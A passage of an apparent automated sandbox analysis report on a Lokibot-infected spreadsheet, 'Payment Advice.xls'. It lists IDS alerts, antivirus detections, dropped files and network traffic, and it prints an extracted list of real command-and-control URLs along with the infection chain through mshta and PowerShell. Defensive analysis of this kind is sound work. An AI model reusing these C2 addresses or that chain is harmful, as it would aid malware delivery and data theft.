                    2024-11-20T07:57:57.056887+010020216411A Network Trojan was detected192.168.2.224923094.156.177.4180TCP
                    2024-11-20T07:57:58.063832+010020216411A Network Trojan was detected192.168.2.224923194.156.177.4180TCP
                    2024-11-20T07:57:59.315019+010020216411A Network Trojan was detected192.168.2.224923294.156.177.4180TCP
                    2024-11-20T07:58:00.406324+010020216411A Network Trojan was detected192.168.2.224923394.156.177.4180TCP
                    2024-11-20T07:58:01.402550+010020216411A Network Trojan was detected192.168.2.224923494.156.177.4180TCP
                    2024-11-20T07:58:02.410939+010020216411A Network Trojan was detected192.168.2.224923594.156.177.4180TCP
                    2024-11-20T07:58:03.281828+010020216411A Network Trojan was detected192.168.2.224923694.156.177.4180TCP
                    2024-11-20T07:58:04.153651+010020216411A Network Trojan was detected192.168.2.224923794.156.177.4180TCP
                    2024-11-20T07:58:05.170720+010020216411A Network Trojan was detected192.168.2.224923894.156.177.4180TCP
                    2024-11-20T07:58:06.042036+010020216411A Network Trojan was detected192.168.2.224923994.156.177.4180TCP
                    2024-11-20T07:58:07.032370+010020216411A Network Trojan was detected192.168.2.224924094.156.177.4180TCP
                    2024-11-20T07:58:08.079653+010020216411A Network Trojan was detected192.168.2.224924194.156.177.4180TCP
                    2024-11-20T07:58:09.075720+010020216411A Network Trojan was detected192.168.2.224924294.156.177.4180TCP
                    2024-11-20T07:58:09.961207+010020216411A Network Trojan was detected192.168.2.224924394.156.177.4180TCP
                    2024-11-20T07:58:10.842151+010020216411A Network Trojan was detected192.168.2.224924494.156.177.4180TCP
                    2024-11-20T07:58:11.848537+010020216411A Network Trojan was detected192.168.2.224924594.156.177.4180TCP
                    2024-11-20T07:58:12.738339+010020216411A Network Trojan was detected192.168.2.224924694.156.177.4180TCP
                    2024-11-20T07:58:13.595288+010020216411A Network Trojan was detected192.168.2.224924794.156.177.4180TCP
                    2024-11-20T07:58:14.448889+010020216411A Network Trojan was detected192.168.2.224924894.156.177.4180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T07:56:57.248279+010028257661Malware Command and Control Activity Detected192.168.2.224916894.156.177.4180TCP
                    2024-11-20T07:56:59.162067+010028257661Malware Command and Control Activity Detected192.168.2.224916994.156.177.4180TCP
                    2024-11-20T07:57:00.038068+010028257661Malware Command and Control Activity Detected192.168.2.224917094.156.177.4180TCP
                    2024-11-20T07:57:00.985981+010028257661Malware Command and Control Activity Detected192.168.2.224917194.156.177.4180TCP
                    2024-11-20T07:57:01.990103+010028257661Malware Command and Control Activity Detected192.168.2.224917294.156.177.4180TCP
                    2024-11-20T07:57:03.028263+010028257661Malware Command and Control Activity Detected192.168.2.224917394.156.177.4180TCP
                    2024-11-20T07:57:04.458084+010028257661Malware Command and Control Activity Detected192.168.2.224917494.156.177.4180TCP
                    2024-11-20T07:57:05.513581+010028257661Malware Command and Control Activity Detected192.168.2.224917694.156.177.4180TCP
                    2024-11-20T07:57:07.053237+010028257661Malware Command and Control Activity Detected192.168.2.224917794.156.177.4180TCP
                    2024-11-20T07:57:08.400152+010028257661Malware Command and Control Activity Detected192.168.2.224917894.156.177.4180TCP
                    2024-11-20T07:57:09.288353+010028257661Malware Command and Control Activity Detected192.168.2.224918294.156.177.4180TCP
                    2024-11-20T07:57:10.533829+010028257661Malware Command and Control Activity Detected192.168.2.224918394.156.177.4180TCP
                    2024-11-20T07:57:11.427592+010028257661Malware Command and Control Activity Detected192.168.2.224918594.156.177.4180TCP
                    2024-11-20T07:57:12.359101+010028257661Malware Command and Control Activity Detected192.168.2.224918694.156.177.4180TCP
                    2024-11-20T07:57:13.469417+010028257661Malware Command and Control Activity Detected192.168.2.224918794.156.177.4180TCP
                    2024-11-20T07:57:14.821226+010028257661Malware Command and Control Activity Detected192.168.2.224918894.156.177.4180TCP
                    2024-11-20T07:57:15.719445+010028257661Malware Command and Control Activity Detected192.168.2.224918994.156.177.4180TCP
                    2024-11-20T07:57:16.626398+010028257661Malware Command and Control Activity Detected192.168.2.224919094.156.177.4180TCP
                    2024-11-20T07:57:17.507138+010028257661Malware Command and Control Activity Detected192.168.2.224919194.156.177.4180TCP
                    2024-11-20T07:57:18.365734+010028257661Malware Command and Control Activity Detected192.168.2.224919294.156.177.4180TCP
                    2024-11-20T07:57:19.253733+010028257661Malware Command and Control Activity Detected192.168.2.224919394.156.177.4180TCP
                    2024-11-20T07:57:20.473746+010028257661Malware Command and Control Activity Detected192.168.2.224919494.156.177.4180TCP
                    2024-11-20T07:57:21.599286+010028257661Malware Command and Control Activity Detected192.168.2.224919594.156.177.4180TCP
                    2024-11-20T07:57:25.465376+010028257661Malware Command and Control Activity Detected192.168.2.224919694.156.177.4180TCP
                    2024-11-20T07:57:26.474558+010028257661Malware Command and Control Activity Detected192.168.2.224919794.156.177.4180TCP
                    2024-11-20T07:57:27.353742+010028257661Malware Command and Control Activity Detected192.168.2.224919894.156.177.4180TCP
                    2024-11-20T07:57:28.253668+010028257661Malware Command and Control Activity Detected192.168.2.224919994.156.177.4180TCP
                    2024-11-20T07:57:29.125788+010028257661Malware Command and Control Activity Detected192.168.2.224920094.156.177.4180TCP
                    2024-11-20T07:57:30.114920+010028257661Malware Command and Control Activity Detected192.168.2.224920194.156.177.4180TCP
                    2024-11-20T07:57:30.992768+010028257661Malware Command and Control Activity Detected192.168.2.224920294.156.177.4180TCP
                    2024-11-20T07:57:32.063042+010028257661Malware Command and Control Activity Detected192.168.2.224920394.156.177.4180TCP
                    2024-11-20T07:57:32.925555+010028257661Malware Command and Control Activity Detected192.168.2.224920494.156.177.4180TCP
                    2024-11-20T07:57:33.906030+010028257661Malware Command and Control Activity Detected192.168.2.224920594.156.177.4180TCP
                    2024-11-20T07:57:34.787024+010028257661Malware Command and Control Activity Detected192.168.2.224920694.156.177.4180TCP
                    2024-11-20T07:57:35.655030+010028257661Malware Command and Control Activity Detected192.168.2.224920794.156.177.4180TCP
                    2024-11-20T07:57:36.530041+010028257661Malware Command and Control Activity Detected192.168.2.224920894.156.177.4180TCP
                    2024-11-20T07:57:37.385969+010028257661Malware Command and Control Activity Detected192.168.2.224920994.156.177.4180TCP
                    2024-11-20T07:57:38.245541+010028257661Malware Command and Control Activity Detected192.168.2.224921094.156.177.4180TCP
                    2024-11-20T07:57:39.100304+010028257661Malware Command and Control Activity Detected192.168.2.224921194.156.177.4180TCP
                    2024-11-20T07:57:40.099524+010028257661Malware Command and Control Activity Detected192.168.2.224921294.156.177.4180TCP
                    2024-11-20T07:57:40.957522+010028257661Malware Command and Control Activity Detected192.168.2.224921394.156.177.4180TCP
                    2024-11-20T07:57:41.834157+010028257661Malware Command and Control Activity Detected192.168.2.224921494.156.177.4180TCP
                    2024-11-20T07:57:42.690842+010028257661Malware Command and Control Activity Detected192.168.2.224921594.156.177.4180TCP
                    2024-11-20T07:57:43.687015+010028257661Malware Command and Control Activity Detected192.168.2.224921694.156.177.4180TCP
                    2024-11-20T07:57:44.686743+010028257661Malware Command and Control Activity Detected192.168.2.224921794.156.177.4180TCP
                    2024-11-20T07:57:45.683162+010028257661Malware Command and Control Activity Detected192.168.2.224921894.156.177.4180TCP
                    2024-11-20T07:57:46.572052+010028257661Malware Command and Control Activity Detected192.168.2.224921994.156.177.4180TCP
                    2024-11-20T07:57:47.625431+010028257661Malware Command and Control Activity Detected192.168.2.224922094.156.177.4180TCP
                    2024-11-20T07:57:48.537909+010028257661Malware Command and Control Activity Detected192.168.2.224922194.156.177.4180TCP
                    2024-11-20T07:57:49.537253+010028257661Malware Command and Control Activity Detected192.168.2.224922294.156.177.4180TCP
                    2024-11-20T07:57:50.541403+010028257661Malware Command and Control Activity Detected192.168.2.224922394.156.177.4180TCP
                    2024-11-20T07:57:51.550185+010028257661Malware Command and Control Activity Detected192.168.2.224922494.156.177.4180TCP
                    2024-11-20T07:57:52.571474+010028257661Malware Command and Control Activity Detected192.168.2.224922594.156.177.4180TCP
                    2024-11-20T07:57:53.565464+010028257661Malware Command and Control Activity Detected192.168.2.224922694.156.177.4180TCP
                    2024-11-20T07:57:54.459148+010028257661Malware Command and Control Activity Detected192.168.2.224922794.156.177.4180TCP
                    2024-11-20T07:57:55.316399+010028257661Malware Command and Control Activity Detected192.168.2.224922894.156.177.4180TCP
                    2024-11-20T07:57:56.191793+010028257661Malware Command and Control Activity Detected192.168.2.224922994.156.177.4180TCP
                    2024-11-20T07:57:57.056887+010028257661Malware Command and Control Activity Detected192.168.2.224923094.156.177.4180TCP
                    2024-11-20T07:57:58.063832+010028257661Malware Command and Control Activity Detected192.168.2.224923194.156.177.4180TCP
                    2024-11-20T07:57:59.315019+010028257661Malware Command and Control Activity Detected192.168.2.224923294.156.177.4180TCP
                    2024-11-20T07:58:00.406324+010028257661Malware Command and Control Activity Detected192.168.2.224923394.156.177.4180TCP
                    2024-11-20T07:58:01.402550+010028257661Malware Command and Control Activity Detected192.168.2.224923494.156.177.4180TCP
                    2024-11-20T07:58:02.410939+010028257661Malware Command and Control Activity Detected192.168.2.224923594.156.177.4180TCP
                    2024-11-20T07:58:03.281828+010028257661Malware Command and Control Activity Detected192.168.2.224923694.156.177.4180TCP
                    2024-11-20T07:58:04.153651+010028257661Malware Command and Control Activity Detected192.168.2.224923794.156.177.4180TCP
                    2024-11-20T07:58:05.170720+010028257661Malware Command and Control Activity Detected192.168.2.224923894.156.177.4180TCP
                    2024-11-20T07:58:06.042036+010028257661Malware Command and Control Activity Detected192.168.2.224923994.156.177.4180TCP
                    2024-11-20T07:58:07.032370+010028257661Malware Command and Control Activity Detected192.168.2.224924094.156.177.4180TCP
                    2024-11-20T07:58:08.079653+010028257661Malware Command and Control Activity Detected192.168.2.224924194.156.177.4180TCP
                    2024-11-20T07:58:09.075720+010028257661Malware Command and Control Activity Detected192.168.2.224924294.156.177.4180TCP
                    2024-11-20T07:58:09.961207+010028257661Malware Command and Control Activity Detected192.168.2.224924394.156.177.4180TCP
                    2024-11-20T07:58:10.842151+010028257661Malware Command and Control Activity Detected192.168.2.224924494.156.177.4180TCP
                    2024-11-20T07:58:11.848537+010028257661Malware Command and Control Activity Detected192.168.2.224924594.156.177.4180TCP
                    2024-11-20T07:58:12.738339+010028257661Malware Command and Control Activity Detected192.168.2.224924694.156.177.4180TCP
                    2024-11-20T07:58:13.595288+010028257661Malware Command and Control Activity Detected192.168.2.224924794.156.177.4180TCP
                    2024-11-20T07:58:14.448889+010028257661Malware Command and Control Activity Detected192.168.2.224924894.156.177.4180TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: Payment Advice.xlsAvira: detected
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeAvira: detection malicious, Label: HEUR/AGEN.1306899
                    Source: C:\Users\user\AppData\Local\Temp\~DF6CCF4596F2406470.TMPAvira: detection malicious, Label: TR/AVI.Agent.xoswb
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exeAvira: detection malicious, Label: HEUR/AGEN.1306899
                    Source: C:\Users\user\AppData\Roaming\caspol.exeAvira: detection malicious, Label: HEUR/AGEN.1306899
                    Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/simple/five/fre.php"]}
                    Source: Payment Advice.xlsReversingLabs: Detection: 21%
                    Source: Payment Advice.xlsVirustotal: Detection: 25%Perma Link
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\caspol.exeJoe Sandbox ML: detected
                    Source: Payment Advice.xlsJoe Sandbox ML: detected

                    Phishing

                    barindex
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta, type: DROPPED
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49165 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49180 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49179 version: TLS 1.2
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.pdbhP source: powershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.pdb source: powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.pdbhP source: powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.pdb source: powershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp

                    Software Vulnerabilities

                    barindex
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
                    Source: global trafficDNS query: name: provit.uk
                    Source: global trafficDNS query: name: provit.uk
                    Source: global trafficDNS query: name: provit.uk
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49184 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49180 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49180 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49180 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49180 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49180 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49180 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49179 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49180 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
